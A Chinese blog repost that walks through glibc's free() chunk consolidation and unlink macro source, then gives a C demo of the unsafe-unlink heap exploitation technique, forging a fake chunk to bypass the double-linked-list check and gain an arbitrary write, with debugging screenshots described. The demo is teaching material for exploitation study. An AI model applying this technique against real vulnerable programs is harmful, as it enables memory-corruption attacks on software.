Glibc堆块的向前向后合并与unlink原理机制探究

最新推荐文章于 2023-06-27 15:10:56 发布
最新推荐文章于 2023-06-27 15:10:56 发布
阅读量274 收藏 2
点赞数
分类专栏: 技术学习 文章标签: 技术

原文地址:https://bbs.ichunqiu.com/thread-46614-1-1.html?from=snew

玩pwn有一段时间了,最近有点生疏了,调起来都不顺手了,所以读读malloc源码回炉一点一点总结反思下。

Unlink是把free掉的chunk从所属的bins链中,卸下来的操作(当然还包括一系列的检测机制),它是在free掉一块chunk(除fastbin大小的chunk外)之后,glibc检查这块chunk相邻的上下两块chunk的free状态之后,做出的向后合并或者向前合并引起的。

向前、向后合并

p是指向free掉的chunk的指针(注意不是指向data的指针,是chunk),size是这块chunk的size。

/* consolidate backward */
4277            if (!prev_inuse(p)) {
4278              prevsize = prev_size (p);
4279              size += prevsize;
4280              p = chunk_at_offset(p, -((long) prevsize));
4281              unlink(av, p, bck, fwd);
4282            }
4283        
4284            if (nextchunk != av->top) {
4285              /* get and clear inuse bit */
4286              nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
4287        
4288              /* consolidate forward */
4289              if (!nextinuse) {
4290                unlink(av, nextchunk, bck, fwd);
4291                size += nextsize;
4292              } else
4293                clear_inuse_bit_at_offset(nextchunk, 0);
4294
4295              /*
4296                Place the chunk in unsorted chunk list. Chunks are
4297                not placed into regular bins until after they have
4298                been given one chance to be used in malloc.
4299              */
4300        
4301              bck = unsorted_chunks(av);
4302              fwd = bck->fd;
4303              if (__glibc_unlikely (fwd->bk != bck))
4304                malloc_printerr ("free(): corrupted unsorted chunks");
4305              p->fd = fwd;
4306              p->bk = bck;
4307              if (!in_smallbin_range(size))
4308                {
4309                  p->fd_nextsize = NULL;
4310                  p->bk_nextsize = NULL;
4311                }
4312              bck->fd = p;
4313              fwd->bk = p;
4314        
4315              set_head(p, size | PREV_INUSE);
4316              set_foot(p, size);
4317        
4318              check_free_chunk(av, p);
4319            }
4320        
4321            /*
4322              If the chunk borders the current high end of memory,
4323              consolidate into top
4324            */
4325        
4326            else {
4327              size += nextsize;
4328              set_head(p, size | PREV_INUSE);
4329              av->top = p;
4330              check_chunk(av, p);
4331            }

向后合并

向后合并部分的代码在4277-4282行

向后合并流程:

  • 检查p指向chunk的size字段的pre_inuse位,是否为0(也就是检查当前chunk的前一块chunk是否是free的,如果是则进入向前合并的流程)
  • 获取前一块chunk的size,并加到size中(以此来表示size大小上已经合并)
  • 根据当前chunk的presize来获得指向前一块chunk的指针
  • 将这个指针传入unlink的宏(也就是让free掉的chunk的前一块chunk进入到unlink流程)

向前合并

如果free掉的chunk相邻的下一块chunk(下面用nextchunk表示,并且nextsize表示它的大小)不是topchunk,并且是free的话就进入向前合并的流程。(见代码4284-4289行)

如果nextchunk不是free的,则修改他的size字段的pre_inuse位。
如果nextchunk是topchunk则和topchunk进行合并。

ps:检测nextchunk是否free,是通过*inuse_bit_at_offset(nextchunk, nextsize)*来获得nextchunk的相邻下一块chunk的size字段的presize位实现的。

向前合并流程(见代码4290-4291):

  • 让nextchunk进入unlink流程
  • 给size加上nextsize(同理也是表示大小上两个chunk已经合并了)

unlink

unlink是个宏,但是在读代码的时候请把bk和fd当作变量。

ps:p是指向chunk的指针。

#define unlink(AV, P, BK, FD) {                                            
            if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      
              malloc_printerr ("corrupted size vs. prev_size");                              
            FD = P->fd;                                                                      
            BK = P->bk;                                                                      
            if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                      
              malloc_printerr ("corrupted double-linked list");                              
            else {                                                                      
                FD->bk = BK;                                                              
                BK->fd = FD;                                                              
                if (!in_smallbin_range (chunksize_nomask (P))                             
                    && __builtin_expect (P->fd_nextsize != NULL, 0)) {                      
                    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)              
                        || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    
                      malloc_printerr ("corrupted double-linked list (not small)");   
                    if (FD->fd_nextsize == NULL) {                                      
                        if (P->fd_nextsize == P)                                      
                          FD->fd_nextsize = FD->bk_nextsize = FD;                      
                        else {                                                              
                            FD->fd_nextsize = P->fd_nextsize;                              
                            FD->bk_nextsize = P->bk_nextsize;                              
                            P->fd_nextsize->bk_nextsize = FD;                              
                            P->bk_nextsize->fd_nextsize = FD;                              
                          }                                                              
                      } else {                                                              
                        P->fd_nextsize->bk_nextsize = P->bk_nextsize;                      
                        P->bk_nextsize->fd_nextsize = P->fd_nextsize;                      
                      }                                                                                   }                                                                      \
              }                                                                              
        }

  • 检查当前chunk的size字段与它相邻的下一块chunk中记录的pre_size是否一样如果不一样,就出现corrupted size vs. prev_size的错误

  • 检查是否满足p->fd->bkp和p->bk->fdp,否则出现corrupted double-linked list,错误。

  • 解链操作:fd->bk=bk和bk->fd=fd(学过循环双链表的都能看懂吧)

    这里配上一张CTFwiki的图:

在这里插入图片描述

  • 接下来的代码其实是对largechunk的一系列检测和处理机制,这里可以不用管,一般实战利用的时候都是对smallchunk进行利用的。

以上就是unlink的操作,本质上就是从glibc管理的bin链中解链以及解链前的安全检查(防止被利用)

那unlink之后又做了什么呢?

整理chunk结构并放入unsortedbin当中

不管是向前合并还是向后合并,unlink后都会来到4301-4318行。

其实做的是,将合并好的chunk加入到unsorted bin中第一个

并且如果这个chunk是samll chunk大小的话它是没有fd_nextsize和bk_nextsize的

然后就设置合并过后的chunk的头部(设置合并过后的size,已经合并形成的chunk的下一块chunk的pre_size字段)

unlink Demo调试验证

理论上面已经谈过了,but**Talk is cheap,Debug is real!**先来个小demo结合上面的原理感受下。

#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

struct chunk_structure {
  size_t prev_size;
  size_t size;
  struct chunk_structure *fd;
  struct chunk_structure *bk;
  char buf[10];               // padding
};

int main() {
  unsigned long long *chunk1, *chunk2;
  struct chunk_structure *fake_chunk, *chunk2_hdr;
  char data[20];

  // First grab two chunks (non fast)
  chunk1 = malloc(0x80);
  chunk2 = malloc(0x80);
  printf("%p\n", &chunk1);
  printf("%p\n", chunk1);
  printf("%p\n", chunk2);

  // Assuming attacker has control over chunk1's contents
  // Overflow the heap, override chunk2's header

  // First forge a fake chunk starting at chunk1
  // Need to setup fd and bk pointers to pass the unlink security check
  fake_chunk = (struct chunk_structure *)chunk1;
  fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
  fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P

  // Next modify the header of chunk2 to pass all security checks
  chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
  chunk2_hdr->prev_size = 0x80;  // chunk1's data region size
  chunk2_hdr->size &= ~1;        // Unsetting prev_in_use bit

  // Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
  // This results in chunk1 pointer pointing to chunk1 - 3
  // i.e. chunk1[3] now contains chunk1 itself.
  // We then make chunk1 point to some victim's data
  free(chunk2);
  printf("%p\n", chunk1);
  printf("%x\n", chunk1[3]);

  chunk1[3] = (unsigned long long)data;

  strcpy(data, "Victim's data");

  // Overwrite victim's data using chunk1
  chunk1[0] = 0x002164656b636168LL;

  printf("%s\n", data);

  return 0;
}

ps:**在这个Demo中假定chun1的数据内容是被攻击者可控的并且可以溢出修改到下面一个chunk

先malloc两个chunk,然后看看他们的地址

然后在chunk1中伪造一个chunk,使得fake_chunk->fd->bkfakechunk和fake_chunk->bd->fdfake_chunk来避过corrupted double-linked list检测。
因为要使得fake_chunk->fd—>bk==fakechunk的话,要使得fake_chunk->fd里面存的是存有chunk1的地址的变量往上偏移0x18,同理fake_chunk->bk也是要网上偏移0x10的。

在这里插入图片描述

然后修改好chunk2的presize字段为0x80就是chunk1的数据大小(用来避过corrupted size vs.
prev_size检测的),和size字段的preinuse位为0(),从而达到欺骗glibc的机制,让它一位chunk2的前一块chunk(也就是chunk1)是free的,并且满足unlink所有的安全机制。这时候free掉chunk2的话就会触发向后合并。

在这里插入图片描述

看一看chunk1和chunk2的情况。以及完全构造好了。接下来就是free(chunk2)触发unlink。触发之后

在这里插入图片描述

chunk1的内容变成了&chunk1-3了。

这是因为fake_chunk->bk->fd=fake_chunk->fd,前面已经讲过fake_chunk->bk->fd指的是chunk1,而fake_chunk->fd指的是&chunk1-0x10.所以一unlink过后,chunk1里边存的是&chunk1-0x10的地址。
看看里边的内容:

在这里插入图片描述

画线的地方是chunk2存的内容,无疑是栈上的东西了。而它前一个8字节存的就是chunk1存的地址0x00007fffffffdcb8,对吧自己算算地址,不就是&chunk1-0x18了么。

weixin_44304686
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
glibc中的malloc
sinat_41619762的博客
09-04 1079
glibcmalloc使用的是ptmalloc分配器。 使用chunk来管理内存单元 .ptmalloc通过chunk的数据结构来组织每个内存单元。当我们使用malloc分配得到一块内存的时候,这块内存就会通过chunk的形式被记录到glibc上并且管理起来。 上图是被分配的chunk。用户获得的指针是mem指针。所以实际上使用的内存大于用户申请的内存。 上图是未分配的chunk。未分配的chunk都串联在bins数组中。 bins数组 ptmalloc一共维护了128bin。每个bins都维护了大小相
深入理解glibc mallocmalloc() 与 free() 原理图解
qq_40989769的博客
10-09 572
在展开本文之前,先解释一下本文中会提到的三个重要概念:arena,bin,chunk。三者在逻辑上的蕴含关系一般如下图所示(图中的chunk严格来说应该是Free Chunk)。三者概念的解释如下:main arena:主线程建立的arena;thread arena:子线程建立的arena;Allocated chunk:即分配给用户且未释放的内存块;Free chunk:即用户已经释放的内存块;
Linux glibc内存管理:用户态内存分配器——ptmalloc实现原理
凌桓丶的博客
03-29 1582
文章目录设计假设ArenaChunkBins内存分配、释放流程 C++ STL : SGI-STL空间配置器源码剖析 Linux 内存管理 | 物理内存管理:物理内存、内存碎片、伙伴系统、slab分配器 Linux 内存管理 | 虚拟内存管理:虚拟内存空间、虚拟内存分配 在之前的几篇博客中,我曾经介绍过STL空间配置器、BuddySystem、Slab分配器等内存管理机制,也曾经简单的提及过linux用户态内存分配的策略,这一次就来深入讲一讲在用户态进行内存分配时,到底做了什么。 设计假设 ptmall
glibcmalloc与free的实现原理(一):用到的数据结构
weixin_44215692的博客
03-30 3988
本系列讲解glibcmalloc和free的实现原理,参考资料是CTF-wiki。本节仅讲解了一些用到的数据结构
阅读glibcmalloc源码理解-chunk结构理解
qq_30528603的博客
05-26 217
拿32位程序来举例子,每个程序都有自己专属的4GB的虚拟空间,我们写的C代码在这个4GB空间中是有明确分布的,详情可以参考我另外一篇博客32位内存布局。我们看到一个chunk的开始其实是chunk指针指向的位置,其实这个叫chunk头,我们使用malloc申请内存的时候,会返回一个指针给我们那个指针就是我图中画的返回给用户的指针是指向用户数据。chunk头对用户来说是透明的,只有操作系统知道。接着是下一个chunk。学过操作系统的都知道,我们的内存是存在分页机制的,将内存划分为一个一个4kb的页框来管理。
Glibc——堆利用机制[拓展]
IfYouHave的博客
06-08 596
堆是每个程序被分配到的一块内存区域,和栈的区别主要在于堆内存是动态分配的。也就是说,程序可以从“heap“段请求一块内存,或者释放一块内存。是ELF文件当中的一个段。另外,堆内存是全局的,即在程序的任意位置都可以访问到堆,并不一定要在调用“malloc”的那个函数里访问。这是因为 C 语言使用指针指向动态分配的内存。但相比访问栈上的静态局部变量,使用指针也带来了一定的开销。
glibc堆内存管理流程图梳理
10-26
glibc堆内存管理流程图梳理
glibc configure后的中间文件
06-09
glibc configure后的中间文件包括 Makefile config.status
glibc内存管理ptmalloc源代码分析-高清PDF-pdf版
04-16
glibc内存管理ptmalloc源代码分析-电子资料-高清PDF版-pdf打印版
Glibc 堆利用的若干方法1
08-03
摘要内存中的攻击与防御一直是系统安全领域的重要研究课题之一,而堆内存破坏漏洞利用以及防护以其特殊的性质在这场宏大的攻防战中扮演着十分独特的角色。由于堆内存粒度细
glibc2.14.1 rpm安装包
最新发布
06-29
glibc2.14.1 rpm安装包,无需编译,直接rpm -ivh 进行安装,方便简单
glibcmalloc与free的实现原理(二):malloc函数的实现
weixin_44215692的博客
04-02 4454
讲解glibcmalloc的实现,为今后pwn的堆利用打好基础
Glibcmalloc的实现
Efren_Yang的专栏
07-02 1745
本文转自:http://blog.csdn.net/phenics/article/details/7770531 前言C语言提供了动态内存管理功能, 在C语言中, 程序员可以使用 malloc() 和 free() 函数显式的分配和释放内存. 关于 malloc() 和free() 函数, C语言标准只是规定了它们需要实现的功能, 而没有对实现方式有什么限制, 这多少让那些追根究底的人感到有些许迷
malloc原理分析:ptmalloc2
qq_40586164的博客
03-25 742
文章目录多线程:主分配区和非主分配区结构chunkbinfast binsunsorted binsmall binslarge binsmmaped chunktop chunkLast remainder流程分配初始化malloc流程内存回收流程如何避免内存暴增? glibcmalloc采用的是ptmalloc2内存池管理方式,使用边界标记法将内存划分成很多块,从而对内存的分配与回收进行管理。 多线程:主分配区和非主分配区 为了支持多线程,ptmalloc使用两类分配区:主分配区main_area和
unlink原理及利用
AFCC_的博客(Web_Dog)
02-27 1637
unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。但这里的前和后都是指在物理内存中的位置,而不是fd和bk链表所指向的堆块。 以当前的chunk为基准,将preivous free chunk合并到当前chunk称为向后合...
Glibc-Malloc和TCMalloc 的基本设计原理Glibc-malloc,Jemalloc,TCMalloc性能差异
天行健,地势坤
11-13 2183
内存分配器的设计艺术 充分体现了底层软件的精妙细节
聊聊glibcmalloc函数的unlink
qq_30528603的博客
06-27 459
它是一个链表结构,表示空闲的chunk,在ptmalloc中讲大小差不多的空闲chunk用这样的bin链表来链接起来。这一段是判断这个P的完整性,用下一个chunk的bk指针和前一个chunk的fd指针来验证是否都指向p,如果验证不完整则会调用malloc_printerr函数来报告错误。如果P指向chunk的下一个chunk是最后一个(这里有点绕,可以回看上面的图),将执行代码块内的内容。因为fd和bk其实都是指向一个chunk的头部的,千万不要以为是指向其fd或者bk的位置,我图画不好请见谅。
内存池】nedmalloc结构分析
yangfm315的专栏
12-10 1461
转载自:http://blog.sina.com.cn/s/blog_4119bd830100tqo7.html nedmalloc是一个跨平台的高性能多线程内存分配库,很多库都使用它,例如:OGRE.现在我们来看看nedmalloc的实现 (以WIN32部分为例)      位操作小技巧; (1)、获取最低位的出现位置的掩码;x&(-x) (2)、判断值为2的幂:x & (x-
堆漏洞挖掘中的top chunk向前合并
董哥的黑板报
07-28 2249
一、top chunk 当我们分配一块堆内存时,top chunk是出于地址的最高处的,其前面就是我们所申请的chunk 二、top chunk合并操作 如果top chunk前面的chunk不是fast chunk并且处于空闲,那么top chunk就会合并这个chunk 如果top chunk前面的chunk是fast chunk,不论是否空闲,top chunk都不会合并这个ch...
glibc堆外内存泄露问题
05-20
glibc堆外内存泄漏问题通常指的是程序中对于堆外内存的不当使用,导致该内存无法被释放,从而造成内存泄漏。 堆外内存是指程序中使用mmap或者sbrk等系统调用分配的内存空间,这些空间不在堆区间内,而是在进程虚拟...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值